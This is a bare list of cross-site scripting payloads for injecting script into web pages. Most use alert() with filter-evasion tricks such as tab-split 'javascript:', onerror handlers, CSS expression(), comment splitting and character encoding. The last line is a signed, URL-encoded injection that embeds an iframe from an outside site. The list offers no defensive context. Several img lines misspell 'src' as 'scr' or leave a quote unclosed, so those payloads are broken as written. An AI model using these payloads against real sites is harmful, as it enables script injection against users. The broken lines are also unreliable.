<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (? is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["